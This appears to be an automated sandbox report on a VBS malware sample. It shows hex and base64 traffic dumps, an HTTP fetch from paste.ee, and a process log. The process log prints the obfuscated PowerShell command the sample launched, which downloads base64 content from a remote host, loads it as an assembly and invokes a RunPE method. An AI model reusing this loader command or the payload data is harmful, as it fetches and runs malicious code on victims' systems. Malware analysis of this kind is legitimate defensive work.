                                                Data Ascii: AAOM78//8RATkq/f//IAcAAAB+xQgABHvkCAAEOrP8//8mIAIAAAA4qPz//wAAARAAAAIAqwD5pAF3AAAAACZ+oQAABBT+ASoAABp+oQAABCoAKv4JAABvZQAACioAKv4JAABvTQAACioALgD+CQAAKPwlAAYqLgD+CQAAKLEEAAYqKv4JAABv+QIABioAKv4JAABv+AIABioAKv4JAABvECMABioALgD+CQAAKCUBAAoqHgAosAQABipK/gkAA
                                                2024-09-26 08:58:18 UTC16384INData Raw: 6f 49 41 41 51 36 59 50 2f 2f 2f 79 59 67 43 41 41 41 41 44 68 56 2f 2f 2f 2f 4f 47 30 41 41 41 41 67 42 77 41 41 41 48 37 46 43 41 41 45 65 37 67 49 41 41 51 36 50 50 2f 2f 2f 79 59 67 42 41 41 41 41 44 67 78 2f 2f 2f 2f 41 41 49 6f 43 77 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 75 67 67 41 42 44 6b 57 2f 2f 2f 2f 4a 69 41 42 41 41 41 41 4f 41 76 2f 2f 2f 38 41 49 49 66 62 73 78 73 67 6d 4f 66 75 4f 6c 67 67 64 4f 74 35 55 57 46 2b 78 51 67 41 42 48 73 43 43 51 41 45 59 53 67 37 41 77 41 47 4b 44 77 44 41 41 5a 36 42 47 39 67 41 41 41 4b 46 79 68 76 41 77 41 47 45 77 49 67 42 67 41 41 41 48 37 46 43 41 41 45 65 37 30 49 41 41 51 36 77 66 37 2f 2f 79 59 67 43 51 41 41 41 44 69 32 2f 76 2f 2f 41 41 51 55 2f 67 45 54 41 53 41 44 41 41 41 41 4f
                                                Data Ascii: oIAAQ6YP///yYgCAAAADhV////OG0AAAAgBwAAAH7FCAAEe7gIAAQ6PP///yYgBAAAADgx////AAIoCwMABiACAAAAfsUIAAR7uggABDkW////JiABAAAAOAv///8AIIfbsxsgmOfuOlggdOt5UWF+xQgABHsCCQAEYSg7AwAGKDwDAAZ6BG9gAAAKFyhvAwAGEwIgBgAAAH7FCAAEe70IAAQ6wf7//yYgCQAAADi2/v//AAQU/gETASADAAAAO
                                                2024-09-26 08:58:18 UTC16384INData Raw: 41 41 4f 4b 37 2f 2f 2f 38 52 41 44 70 2f 41 41 41 41 49 41 51 41 41 41 41 34 6e 66 2f 2f 2f 78 45 43 4f 71 49 41 41 41 41 67 41 41 41 41 41 48 37 46 43 41 41 45 65 38 4d 49 41 41 51 36 67 76 2f 2f 2f 79 59 67 41 41 41 41 41 44 68 33 2f 2f 2f 2f 41 41 49 6f 70 41 4d 41 42 69 41 43 41 41 41 41 66 73 55 49 41 41 52 37 76 67 67 41 42 44 70 63 2f 2f 2f 2f 4a 69 41 44 41 41 41 41 4f 46 48 2f 2f 2f 38 41 4b 67 41 44 46 43 69 79 41 77 41 47 45 77 41 67 42 51 41 41 41 44 67 37 2f 2f 2f 2f 4f 44 41 41 41 41 41 67 43 41 41 41 41 50 34 4f 41 51 41 34 4a 50 2f 2f 2f 77 41 67 4a 47 76 43 36 53 41 58 47 50 4f 77 59 58 37 46 43 41 41 45 65 38 41 49 41 41 52 68 4b 4b 30 44 41 41 59 6f 73 51 51 41 42 6e 6f 43 65 37 4d 41 41 41 51 54 41 69 41 48 41 41 41 41 4f 50 54 2b 2f
                                                Data Ascii: AAOK7///8RADp/AAAAIAQAAAA4nf///xECOqIAAAAgAAAAAH7FCAAEe8MIAAQ6gv///yYgAAAAADh3////AAIopAMABiACAAAAfsUIAAR7vggABDpc////JiADAAAAOFH///8AKgADFCiyAwAGEwAgBQAAADg7////ODAAAAAgCAAAAP4OAQA4JP///wAgJGvC6SAXGPOwYX7FCAAEe8AIAARhKK0DAAYosQQABnoCe7MAAAQTAiAHAAAAOPT+/
                                                2024-09-26 08:58:18 UTC16384INData Raw: 4d 41 41 41 45 6f 38 67 4d 41 42 69 6a 7a 41 77 41 47 45 78 51 67 42 51 41 41 41 48 37 46 43 41 41 45 65 78 49 4a 41 41 51 36 42 65 66 2f 2f 79 59 67 41 51 41 41 41 44 6a 36 35 76 2f 2f 41 41 4b 6c 6c 51 41 41 41 58 4f 4d 41 51 41 4b 6a 4a 63 41 41 41 45 54 41 79 41 67 41 41 41 41 4f 4e 33 6d 2f 2f 38 41 45 51 48 51 43 67 41 41 41 53 6a 79 41 77 41 47 4b 50 4d 44 41 41 59 54 48 79 41 4b 41 41 41 41 4f 4c 2f 6d 2f 2f 38 34 73 4f 2f 2f 2f 79 41 4c 41 41 41 41 66 73 55 49 41 41 52 37 33 77 67 41 42 44 71 6d 35 76 2f 2f 4a 69 42 4a 41 41 41 41 4f 4a 76 6d 2f 2f 38 34 32 50 72 2f 2f 79 42 32 41 41 41 41 4f 49 7a 6d 2f 2f 38 41 41 6d 38 6c 41 41 41 4b 4b 4b 49 41 41 41 6f 6f 41 41 51 41 42 6f 79 57 41 41 41 42 45 77 4d 67 44 77 41 41 41 50 34 4f 4c 67 41 34 59
                                                Data Ascii: MAAAEo8gMABijzAwAGExQgBQAAAH7FCAAEexIJAAQ6Bef//yYgAQAAADj65v//AAKllQAAAXOMAQAKjJcAAAETAyAgAAAAON3m//8AEQHQCgAAASjyAwAGKPMDAAYTHyAKAAAAOL/m//84sO///yALAAAAfsUIAAR73wgABDqm5v//JiBJAAAAOJvm//842Pr//yB2AAAAOIzm//8AAm8lAAAKKKIAAAooAAQABoyWAAABEwMgDwAAAP4OLgA4Y
                                                2024-09-26 08:58:18 UTC16384INData Raw: 45 41 41 41 42 2b 78 51 67 41 42 48 76 71 43 41 41 45 4f 53 37 2f 2f 2f 38 6d 49 41 45 41 41 41 41 34 49 2f 2f 2f 2f 77 41 54 4d 41 51 41 52 67 41 41 41 4d 73 41 41 42 45 41 41 67 4d 45 4b 50 30 42 41 41 6f 41 41 6e 76 38 41 51 41 4b 4f 68 67 41 41 41 41 44 46 6a 38 52 41 41 41 41 41 77 49 6f 2f 67 45 41 43 76 34 43 46 76 34 42 4f 41 45 41 41 41 41 57 43 67 59 35 45 41 41 41 41 41 41 43 65 2f 51 42 41 41 6f 44 42 47 2f 65 41 51 41 4b 41 41 41 71 41 41 41 54 4d 41 51 41 6c 51 45 41 41 41 51 41 41 42 45 67 41 77 41 41 41 50 34 4f 41 41 41 34 41 41 41 41 41 50 34 4d 41 41 42 46 43 77 41 41 41 4b 77 41 41 41 43 48 41 41 41 41 30 77 41 41 41 4f 49 41 41 41 42 55 41 41 41 41 4b 51 41 41 41 41 55 41 41 41 42 45 41 41 41 41 47 67 45 41 41 50 51 41 41 41 43 71 41
                                                Data Ascii: EAAAB+xQgABHvqCAAEOS7///8mIAEAAAA4I////wATMAQARgAAAMsAABEAAgMEKP0BAAoAAnv8AQAKOhgAAAADFj8RAAAAAwIo/gEACv4CFv4BOAEAAAAWCgY5EAAAAAACe/QBAAoDBG/eAQAKAAAqAAATMAQAlQEAAAQAABEgAwAAAP4OAAA4AAAAAP4MAABFCwAAAKwAAACHAAAA0wAAAOIAAABUAAAAKQAAAAUAAABEAAAAGgEAAPQAAACqA
                                                2024-09-26 08:58:18 UTC16384INData Raw: 41 44 41 6e 74 45 41 67 41 4b 2f 67 51 4c 42 7a 6b 67 41 41 41 41 41 41 4a 37 52 51 49 41 43 67 4d 43 65 30 55 43 41 41 6f 44 46 31 67 43 65 30 51 43 41 41 6f 44 57 53 6a 51 41 51 41 4b 41 41 41 43 65 30 55 43 41 41 6f 44 42 4b 51 31 41 41 41 62 41 67 4a 37 52 41 49 41 43 68 64 59 66 55 51 43 41 41 6f 71 41 41 41 54 4d 41 4d 41 54 77 41 41 41 41 4d 42 41 42 45 41 41 6e 74 45 41 67 41 4b 43 6a 67 75 41 41 41 41 41 41 59 58 57 51 6f 43 65 30 55 43 41 41 6f 47 6f 7a 55 41 41 42 75 4d 4e 51 41 41 47 77 4f 4d 4e 51 41 41 47 2f 34 42 43 77 63 35 43 41 41 41 41 41 41 47 44 44 67 54 41 41 41 41 41 41 59 57 2f 67 49 4e 43 54 72 48 2f 2f 2f 2f 46 51 77 34 41 41 41 41 41 41 67 71 41 42 4d 77 41 77 41 74 41 41 41 41 62 41 41 41 45 51 41 43 41 79 6a 47 41 51 41 4b 43
                                                Data Ascii: ADAntEAgAK/gQLBzkgAAAAAAJ7RQIACgMCe0UCAAoDF1gCe0QCAAoDWSjQAQAKAAACe0UCAAoDBKQ1AAAbAgJ7RAIAChdYfUQCAAoqAAATMAMATwAAAAMBABEAAntEAgAKCjguAAAAAAYXWQoCe0UCAAoGozUAABuMNQAAGwOMNQAAG/4BCwc5CAAAAAAGDDgTAAAAAAYW/gINCTrH////FQw4AAAAAAgqABMwAwAtAAAAbAAAEQACAyjGAQAKC


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.749704188.114.97.34436488C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                TimestampBytes transferredDirectionData
                                                2024-09-26 08:58:21 UTC67OUTGET /d/tbzjY/0 HTTP/1.1
                                                Host: paste.ee
                                                Connection: Keep-Alive
                                                2024-09-26 08:58:22 UTC1204INHTTP/1.1 200 OK
                                                Date: Thu, 26 Sep 2024 08:58:22 GMT
                                                Content-Type: text/plain; charset=utf-8
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Cache-Control: max-age=2592000
                                                strict-transport-security: max-age=63072000
                                                x-frame-options: DENY
                                                x-content-type-options: nosniff
                                                x-xss-protection: 1; mode=block
                                                content-security-policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                CF-Cache-Status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KofYHk4I6vsMqfYCiuwy9Lh2oNVtBjsaMpVeoyiTjt%2FKisk0pj2hrhT20OM6OY%2FmBQQ5L5stbhq2qpNO1X1l52pb%2BljTmH8aM8Yi2wDesHLNwS90vD7Z5nPXAQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 8c920d3f092c43cf-EWR
                                                2024-09-26 08:58:22 UTC165INData Raw: 31 66 37 66 0d 0a 3d 3d 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 38 67 4b 50 49 79 44 62 38 77 45 50 73 77 44 43 37 77 2f 4f 63 76 44 73 37 51 35 4f 30 74 44 56 37 41 7a 4f 51 6f 44 37 36 77 73 4f 73 71 44 6a 36 77 6d 4f 45 70 44 4b 36 41 68 4f 49 6f 44 42 36 41 51 4f 38 6e 44 2b 35 51 66 4f 67 4f 44
                                                Data Ascii: 1f7f==AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA8gKPIyDb8wEPswDC7w/OcvDs7Q5O0tDV7AzOQoD76wsOsqDj6wmOEpDK6AhOIoDB6AQO8nD+5QfOgOD
                                                2024-09-26 08:58:22 UTC1369INData Raw: 4e 7a 41 6a 4d 6b 4b 44 6f 79 51 6f 4d 41 4b 44 66 79 41 6e 4d 59 4a 44 53 79 67 6a 4d 6f 49 44 47 78 67 65 4d 59 48 44 31 78 41 64 4d 4d 48 44 79 78 51 63 4d 41 48 44 76 78 67 62 4d 73 47 44 71 78 51 61 4d 67 47 44 6e 78 67 5a 4d 55 47 44 6b 78 77 59 4d 49 47 44 65 78 51 58 4d 77 42 41 41 41 77 49 41 48 41 42 41 2b 51 72 50 67 36 44 6d 2b 51 6f 50 38 35 44 64 2b 77 6d 50 6f 35 44 59 2b 77 6b 50 45 35 44 4d 2b 67 69 50 67 34 44 47 2b 51 68 50 51 34 44 44 2b 67 67 50 41 30 44 2f 39 51 66 50 67 33 44 32 39 51 63 50 38 32 44 74 39 77 61 50 49 32 44 67 39 67 58 50 30 31 44 57 39 67 54 50 30 30 44 47 38 67 50 50 59 7a 44 75 38 67 4a 50 34 78 44 57 38 67 44 50 59 73 44 2b 37 67 39 4f 34 75 44 6d 37 67 33 4f 59 74 44 4f 37 67 68 4f 34 72 44 32 36 67 72 4f 59 71
                                                Data Ascii: NzAjMkKDoyQoMAKDfyAnMYJDSygjMoIDGxgeMYHD1xAdMMHDyxQcMAHDvxgbMsGDqxQaMgGDnxgZMUGDkxwYMIGDexQXMwBAAAwIAHABA+QrPg6Dm+QoP85Dd+wmPo5DY+wkPE5DM+giPg4DG+QhPQ4DD+ggPA0D/9QfPg3D29QcP82Dt9waPI2Dg9gXP01DW9gTP00DG8gPPYzDu8gJP4xDW8gDPYsD+7g9O4uDm7g3OYtDO7ghO4rD26grOYq
                                                2024-09-26 08:58:22 UTC1369INData Raw: 7a 67 35 4d 51 4f 44 69 7a 41 34 4d 34 4e 44 63 7a 67 32 4d 67 4e 44 57 7a 41 31 4d 49 4e 44 51 7a 67 7a 4d 77 4d 44 4b 7a 41 79 4d 59 4d 44 45 7a 67 77 4d 41 49 44 2b 79 41 76 4d 6f 4c 44 34 79 67 74 4d 51 4c 44 79 79 41 73 4d 34 4b 44 73 79 67 71 4d 67 4b 44 6d 79 41 70 4d 49 4b 44 67 79 67 6e 4d 77 4a 44 61 79 41 6d 4d 59 4a 44 55 79 67 6b 4d 41 4a 44 4f 79 41 6a 4d 6f 49 44 49 79 67 68 4d 51 49 44 43 79 41 51 4d 34 48 44 38 78 67 65 4d 67 48 44 32 78 41 64 4d 49 48 44 77 78 67 62 4d 77 47 44 71 78 41 61 4d 59 47 44 6b 78 67 59 4d 41 47 44 65 78 41 58 4d 6f 46 44 59 78 67 56 4d 51 46 44 53 78 41 55 4d 34 45 44 4d 78 67 53 4d 67 45 44 47 78 41 52 4d 49 45 44 41 77 67 50 4d 77 44 44 36 77 41 4f 4d 59 44 44 30 77 67 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44
                                                Data Ascii: zg5MQODizA4M4NDczg2MgNDWzA1MINDQzgzMwMDKzAyMYMDEzgwMAID+yAvMoLD4ygtMQLDyyAsM4KDsygqMgKDmyApMIKDgygnMwJDayAmMYJDUygkMAJDOyAjMoIDIyghMQIDCyAQM4HD8xgeMgHD2xAdMIHDwxgbMwGDqxAaMYGDkxgYMAGDexAXMoFDYxgVMQFDSxAUM4EDMxgSMgEDGxARMIEDAwgPMwDD6wAOMYDD0wgMMADDuwALMoCD
                                                2024-09-26 08:58:22 UTC1369INData Raw: 41 6a 4d 6b 49 44 47 79 77 67 4d 41 45 44 39 78 67 65 4d 63 48 44 30 78 51 63 4d 34 47 44 72 78 41 61 4d 55 47 44 69 78 77 58 4d 77 46 44 5a 78 67 56 4d 4d 46 44 51 78 51 54 4d 6f 45 44 48 78 41 52 4d 45 41 44 2b 77 77 4f 4d 67 44 44 31 77 67 4d 4d 38 43 44 73 77 51 4b 4d 59 43 44 6a 77 41 49 4d 30 42 44 61 77 77 46 4d 51 42 44 52 77 67 44 4d 73 41 44 49 77 51 42 4d 49 41 41 41 44 67 48 41 47 41 41 41 2f 77 2f 50 77 2f 44 35 2f 67 39 50 4d 2f 44 77 2f 51 37 50 6f 2b 44 6e 2f 41 35 50 45 2b 44 65 2f 77 32 50 67 39 44 56 2f 67 30 50 38 38 44 4d 31 51 63 4e 41 58 44 76 31 67 4c 4e 57 52 6a 55 30 34 45 4e 4b 42 41 41 41 77 44 41 46 41 50 41 41 41 41 50 4d 7a 44 79 38 51 4d 50 41 7a 44 76 38 67 4c 50 30 79 44 73 38 77 4b 50 6f 79 44 70 38 41 4b 50 63 79 44 6d
                                                Data Ascii: AjMkIDGywgMAED9xgeMcHD0xQcM4GDrxAaMUGDixwXMwFDZxgVMMFDQxQTMoEDHxARMEAD+wwOMgDD1wgMM8CDswQKMYCDjwAIM0BDawwFMQBDRwgDMsADIwQBMIAAADgHAGAAA/w/Pw/D5/g9PM/Dw/Q7Po+Dn/A5PE+De/w2Pg9DV/g0P88DM1QcNAXDv1gLNWRjU04ENKBAAAwDAFAPAAAAPMzDy8QMPAzDv8gLP0yDs8wKPoyDp8AKPcyDm
                                                2024-09-26 08:58:22 UTC1369INData Raw: 4d 4d 41 44 44 75 77 41 4c 4d 6f 43 44 6f 77 67 4a 4d 51 43 44 69 77 41 49 4d 34 42 44 63 77 67 47 4d 67 42 44 57 77 41 46 4d 49 42 44 51 77 67 44 4d 77 41 44 4b 77 41 43 4d 59 41 44 45 77 67 41 4d 41 41 41 41 42 41 49 41 46 41 4c 41 2f 67 2f 50 77 2f 44 36 2f 41 2b 50 59 2f 44 30 2f 67 38 50 41 2f 44 75 2f 41 37 50 6f 2b 44 6f 2f 67 35 50 51 2b 44 69 2f 41 34 50 34 39 44 63 2f 67 32 50 67 39 44 57 2f 41 31 50 49 39 44 51 2f 67 7a 50 77 38 44 4b 2f 41 79 50 59 38 44 45 2f 67 77 50 41 34 44 2b 2b 41 76 50 6f 37 44 34 2b 67 74 50 51 37 44 79 2b 41 73 50 34 36 44 74 2b 77 71 50 6b 36 44 6e 2b 51 70 50 4d 36 44 68 2b 77 6e 50 30 35 44 62 2b 51 6d 50 63 35 44 56 2b 77 6b 50 45 35 44 50 2b 51 6a 50 73 34 44 4a 2b 77 68 50 55 34 44 44 2b 51 51 50 38 33 44 39 39
                                                Data Ascii: MMADDuwALMoCDowgJMQCDiwAIM4BDcwgGMgBDWwAFMIBDQwgDMwADKwACMYADEwgAMAAAABAIAFALA/g/Pw/D6/A+PY/D0/g8PA/Du/A7Po+Do/g5PQ+Di/A4P49Dc/g2Pg9DW/A1PI9DQ/gzPw8DK/AyPY8DE/gwPA4D++AvPo7D4+gtPQ7Dy+AsP46Dt+wqPk6Dn+QpPM6Dh+wnP05Db+QmPc5DV+wkPE5DP+QjPs4DJ+whPU4DD+QQP83D99
                                                2024-09-26 08:58:22 UTC1369INData Raw: 4e 34 56 44 64 31 41 58 4e 73 56 44 61 31 51 57 4e 67 56 44 58 31 67 56 4e 55 56 44 55 31 77 55 4e 49 56 44 52 31 41 55 4e 38 55 44 4f 31 51 54 4e 77 55 44 4c 31 67 53 4e 6b 55 44 49 31 77 52 4e 59 55 44 46 31 41 52 4e 4d 55 44 43 31 41 41 41 41 45 41 62 41 55 41 6b 41 45 44 37 78 49 65 4d 59 48 6a 7a 78 51 63 4d 36 47 44 73 78 59 61 4d 63 47 6a 6b 78 67 59 4d 2b 46 44 64 78 6f 57 4d 67 46 6a 56 78 77 55 4d 43 46 44 4f 78 34 53 4d 6b 45 6a 47 78 41 52 4d 47 41 44 2f 77 49 50 4d 6a 44 54 32 77 38 4d 4d 46 44 7a 75 77 45 4c 4d 6e 43 54 6e 77 4d 4a 4d 4a 43 7a 66 77 55 48 4d 72 42 54 59 77 63 46 4d 44 42 54 4f 77 38 43 4d 6c 41 54 47 77 34 41 4d 45 41 41 41 41 67 47 41 46 41 49 41 41 41 77 50 36 2f 44 38 2f 59 2b 50 63 2f 6a 30 2f 67 38 50 2b 2b 6a 73 2f 63
                                                Data Ascii: N4VDd1AXNsVDa1QWNgVDX1gVNUVDU1wUNIVDR1AUN8UDO1QTNwUDL1gSNkUDI1wRNYUDF1ARNMUDC1AAAAEAbAUAkAED7xIeMYHjzxQcM6GDsxYaMcGjkxgYM+FDdxoWMgFjVxwUMCFDOx4SMkEjGxARMGAD/wIPMjDT2w8MMFDzuwELMnCTnwMJMJCzfwUHMrBTYwcFMDBTOw8CMlATGw4AMEAAAAgGAFAIAAAwP6/D8/Y+Pc/j0/g8P++js/c
                                                2024-09-26 08:58:22 UTC1061INData Raw: 4d 51 44 2b 30 77 4f 4e 6a 53 7a 59 30 41 46 4e 75 51 44 43 7a 55 2b 4d 63 4f 7a 6c 7a 45 35 4d 4d 4f 6a 57 7a 38 67 4d 6f 4c 44 74 79 49 69 4d 50 45 54 32 78 49 61 4d 74 46 44 5a 78 59 56 4d 42 46 54 45 77 6f 50 4d 76 44 7a 32 77 41 4e 4d 4c 44 6a 71 77 30 48 41 41 41 41 73 41 51 41 38 41 34 7a 61 2b 41 6c 50 59 30 44 77 39 41 62 50 6d 32 54 6d 39 38 59 50 41 32 6a 5a 39 38 56 50 59 31 54 55 39 34 52 50 4a 30 44 42 38 4d 50 50 70 7a 7a 79 38 38 4b 50 64 79 7a 69 38 77 48 50 43 6f 54 2b 36 49 74 4f 6e 70 44 51 35 73 70 4e 53 62 7a 73 32 55 55 4e 71 58 54 69 30 30 4c 4e 77 53 44 71 30 73 33 4d 46 4e 6a 41 79 45 75 4d 5a 4c 54 77 79 30 61 4d 67 48 54 73 78 45 45 4d 32 44 6a 37 77 49 48 4d 72 42 7a 4b 41 41 41 41 77 42 41 42 67 44 41 41 41 38 44 7a 2f 38 35
                                                Data Ascii: MQD+0wONjSzY0AFNuQDCzU+McOzlzE5MMOjWz8gMoLDtyIiMPET2xIaMtFDZxYVMBFTEwoPMvDz2wANMLDjqw0HAAAAsAQA8A4za+AlPY0Dw9AbPm2Tm98YPA2jZ98VPY1TU94RPJ0DB8MPPpzzy88KPdyzi8wHPCoT+6ItOnpDQ5spNSbzs2UUNqXTi00LNwSDq0s3MFNjAyEuMZLTwy0aMgHTsxEEM2Dj7wIHMrBzKAAAAwBABgDAAA8Dz/85
                                                2024-09-26 08:58:22 UTC1369INData Raw: 32 30 30 30 0d 0a 61 78 41 57 4d 38 45 44 4e 77 55 50 4d 74 44 44 72 77 45 4b 4d 4f 42 44 53 41 41 41 41 67 43 41 42 51 43 77 50 68 2f 54 32 2f 73 38 50 44 2f 6a 75 2f 45 37 50 70 2b 54 6f 2f 6b 35 50 4f 2b 44 66 2f 51 33 50 6f 39 44 59 2f 63 31 50 4f 39 6a 52 2f 34 7a 50 32 38 6a 4c 2f 45 79 50 56 38 54 44 2b 38 73 50 6a 36 7a 64 2b 41 6c 50 4b 35 44 52 2b 34 6a 50 32 34 6a 4d 2b 63 69 50 59 34 44 44 39 73 66 50 76 33 54 33 39 6b 62 50 71 32 44 6e 39 6f 58 50 31 31 44 63 39 77 56 50 52 31 44 50 39 38 53 50 6b 77 54 39 38 63 4e 50 53 7a 54 7a 38 49 4d 50 6d 79 6a 67 38 38 45 50 4b 78 54 52 38 6f 44 50 4a 73 54 35 37 41 2b 4f 62 76 44 30 37 51 37 4f 64 75 6a 67 37 30 33 4f 34 74 54 62 37 45 31 4f 42 74 44 49 37 73 78 4f 57 73 7a 43 36 6b 75 4f 58 72 54 75
                                                Data Ascii: 2000axAWM8EDNwUPMtDDrwEKMOBDSAAAAgCABQCwPh/T2/s8PD/ju/E7Pp+To/k5PO+Df/Q3Po9DY/c1PO9jR/4zP28jL/EyPV8TD+8sPj6zd+AlPK5DR+4jP24jM+ciPY4DD9sfPv3T39kbPq2Dn9oXP11Dc9wVPR1DP98SPkwT98cNPSzTz8IMPmyjg88EPKxTR8oDPJsT57A+ObvD07Q7Odujg703O4tTb7E1OBtDI7sxOWszC6kuOXrTu
                                                2024-09-26 08:58:22 UTC1369INData Raw: 71 4e 69 55 44 32 31 4d 63 4e 70 56 6a 46 30 6b 77 4d 72 4d 44 43 79 67 64 4d 48 44 41 41 41 77 45 41 45 41 43 41 37 4d 47 4f 56 63 44 2b 33 59 36 4e 41 5a 44 4b 31 73 57 4e 79 55 44 44 30 41 39 4d 7a 50 54 41 79 41 74 4d 79 45 54 37 78 6f 62 4d 6f 46 7a 4f 78 34 41 4d 63 42 41 41 41 41 44 41 45 41 42 41 41 41 77 50 6e 2b 7a 64 2b 6b 53 50 69 33 7a 68 39 6b 33 4f 42 70 54 64 35 6b 45 4f 35 69 7a 6b 34 59 33 4e 45 61 6a 6e 32 63 6a 4e 6b 55 54 38 31 45 38 4d 6e 49 6a 35 79 55 73 4d 68 4b 6a 6d 79 55 70 4d 6c 45 54 61 77 6f 4a 41 41 41 41 51 41 51 41 41 41 38 6a 35 2f 45 2b 50 43 37 6a 78 2b 55 71 50 42 36 6a 65 2b 55 6e 50 49 30 44 48 38 77 65 4f 51 6d 6a 68 7a 63 67 4d 67 46 44 4d 78 6f 41 4d 74 44 7a 4e 77 73 42 41 41 41 41 4d 41 4d 41 38 41 41 41 41 2f
                                                Data Ascii: qNiUD21McNpVjF0kwMrMDCygdMHDAAAwEAEACA7MGOVcD+3Y6NAZDK1sWNyUDD0A9MzPTAyAtMyET7xobMoFzOx4AMcBAAAADAEABAAAwPn+zd+kSPi3zh9k3OBpTd5kEO5izk4Y3NEajn2cjNkUT81E8MnIj5yUsMhKjmyUpMlETawoJAAAAQAQAAA8j5/E+PC7jx+UqPB6je+UnPI0DH8weOQmjhzcgMgFDMxoAMtDzNwsBAAAAMAMA8AAAA/
                                                2024-09-26 08:58:22 UTC1369INData Raw: 4d 48 44 54 77 77 77 4c 4d 32 43 44 73 77 6f 4b 4d 6c 43 7a 6e 77 6b 4a 4d 54 43 6a 6a 77 67 49 4d 43 43 44 66 77 63 48 4d 78 42 7a 61 77 55 47 4d 67 42 6a 57 77 4d 46 4d 4f 42 54 53 77 4d 45 4d 39 41 7a 4e 77 49 44 4d 73 41 6a 4a 77 41 43 4d 62 41 54 46 77 38 41 4d 4a 41 44 42 41 41 51 41 49 42 77 41 67 42 41 41 41 38 6a 2f 2f 67 2f 50 79 2f 54 37 2f 63 2b 50 68 2f 7a 32 2f 59 39 50 51 2f 6a 79 2f 51 38 50 2f 2b 54 75 2f 4d 37 50 74 2b 44 71 2f 49 36 50 63 2b 6a 6c 2f 45 35 50 4c 2b 54 68 2f 38 33 50 36 39 44 64 2f 34 32 50 6f 39 7a 59 2f 30 31 50 58 39 54 55 2f 77 30 50 47 39 44 51 2f 6f 7a 50 31 38 7a 4c 2f 6b 79 50 6a 38 6a 48 2f 67 78 50 53 38 44 44 2f 63 77 50 42 34 6a 2b 2b 4d 76 50 74 37 44 69 39 45 61 50 56 77 54 30 38 51 4d 50 39 79 7a 74 38 45
                                                Data Ascii: MHDTwwwLM2CDswoKMlCznwkJMTCjjwgIMCCDfwcHMxBzawUGMgBjWwMFMOBTSwMEM9AzNwIDMsAjJwACMbATFw8AMJADBAAQAIBwAgBAAA8j//g/Py/T7/c+Ph/z2/Y9PQ/jy/Q8P/+Tu/M7Pt+Dq/I6Pc+jl/E5PL+Th/83P69Dd/42Po9zY/01PX9TU/w0PG9DQ/ozP18zL/kyPj8jH/gxPS8DD/cwPB4j++MvPt7Di9EaPVwT08QMP9yzt8E


                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:04:58:08
                                                Start date:26/09/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                                                Imagebase:0x7ff61a1b0000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:04:58:09
                                                Start date:26/09/2024
                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgneycrJzF9JysndXJsICcrJz0nKycgezB9aHQnKyd0cCcrJ3MnKyc6Ly9pYTYwMDEnKycwMCcrJy51cy4nKydhcmNoaXZlJysnLm9yJysnZycrJy8yNC8nKydpdGVtcy9kJysnZXQnKydhaC0nKyduJysnb3QnKydlLScrJ3YvRCcrJ2UnKyd0JysnYScrJ2hOJysnb3RlVicrJy4nKyd0JysneCcrJ3R7MH0nKyc7eycrJzEnKyd9YmFzZTYnKyc0JysnQ28nKydudGVudCA9IChOZScrJ3cnKyctT2JqZWMnKyd0IFN5c3RlJysnbS5OZXQuJysnV2ViQ2xpZScrJ250KS5EJysnb3cnKydubCcrJ28nKydhJysnZFN0cmknKyduZyh7MX11JysncmwpOycrJ3snKycxJysnfWJpbicrJ2FyeUNvJysnbicrJ3RlbnQgPScrJyBbU3knKydzdCcrJ2VtLicrJ0MnKydvbnZlcnQnKyddOjonKydGJysncm9tJysnQicrJ2EnKydzZTY0JysnU3RyaW5nKHsxfWJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpO3sxJysnfWFzJysnc2UnKydtYmx5JysnID0nKycgW1JlZmwnKydlY3QnKydpbycrJ24uJysnQXMnKydzZW1ibHknKyddOjpMb2FkJysnKHsxfScrJ2JpbmFyJysneUNvbicrJ3RlbnQpO3sxfXR5JysncCcrJ2UgJysnPSB7MX1hJysnc3MnKydlbWJsJysneScrJy4nKydHZXRUeXAnKydlKHsnKycwfVJ1bicrJ1BFLkhvbWV7JysnMH0pOycrJ3snKycxfW0nKydlJysndCcrJ2gnKydvZCA9IHsxfXR5cCcrJ2UuR2UnKyd0TWUnKyd0aCcrJ29kKHsnKycwfVZBSXswfSk7ezEnKyd9bWV0JysnaG8nKydkJysnLkknKydudm9rZSh7MScrJ31udScrJ2xsJysnLCBbb2InKydqZWMnKyd0WycrJ10nKyddJysnQCcrJyh7JysnMH0wLycrJ1lqemInKyd0JysnL2QvZScrJ2